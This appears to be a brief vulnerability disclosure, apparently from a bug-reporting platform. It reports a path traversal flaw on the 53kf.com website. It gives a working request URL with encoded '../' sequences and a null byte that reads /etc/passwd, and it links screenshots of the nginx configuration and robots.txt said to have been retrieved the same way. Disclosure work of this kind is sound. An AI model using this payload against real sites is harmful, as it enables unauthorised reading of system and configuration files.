### Summary:
I heard you guys are pretty good, so let's test the waters first.
### Details:
The vulnerable address is:
http://www.53kf.com/?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00login
### Proof of vulnerability:
[![53kf.jpg](https://images.seebug.org/upload/201501/18221952ee885234fcb6f3f7034345ea1e2dab5d.jpg)](https://images.seebug.org/upload/201501/18221952ee885234fcb6f3f7034345ea1e2dab5d.jpg)
The nginx configuration file was successfully guessed, as shown below:
[![53kf_nginx.jpg](https://images.seebug.org/upload/201501/182238087582c1c3b724291f746065051c138a0d.jpg)](https://images.seebug.org/upload/201501/182238087582c1c3b724291f746065051c138a0d.jpg)
That gave the site's root path, so let's try reading robots.txt:
[![53kf_robots.jpg](https://images.seebug.org/upload/201501/18223840f163b88a2cdb40f393f64a7a4fd6e08d.jpg)](https://images.seebug.org/upload/201501/18223840f163b88a2cdb40f393f64a7a4fd6e08d.jpg)
So, does that mean a code audit is now possible?